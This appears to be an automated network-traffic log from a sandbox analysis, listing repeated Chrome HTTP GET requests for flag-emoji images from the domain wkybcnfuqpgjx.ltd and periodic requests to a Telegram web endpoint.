Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1eb-1f1ef.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ea-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1eb-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1eb-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1eb-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1eb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ea-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1eb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1eb-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1eb-1f1ef.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1eb-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e9-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1eb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1ed.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1eb-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1eb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e9-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f5.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1ed.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ed-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f5.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ed-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
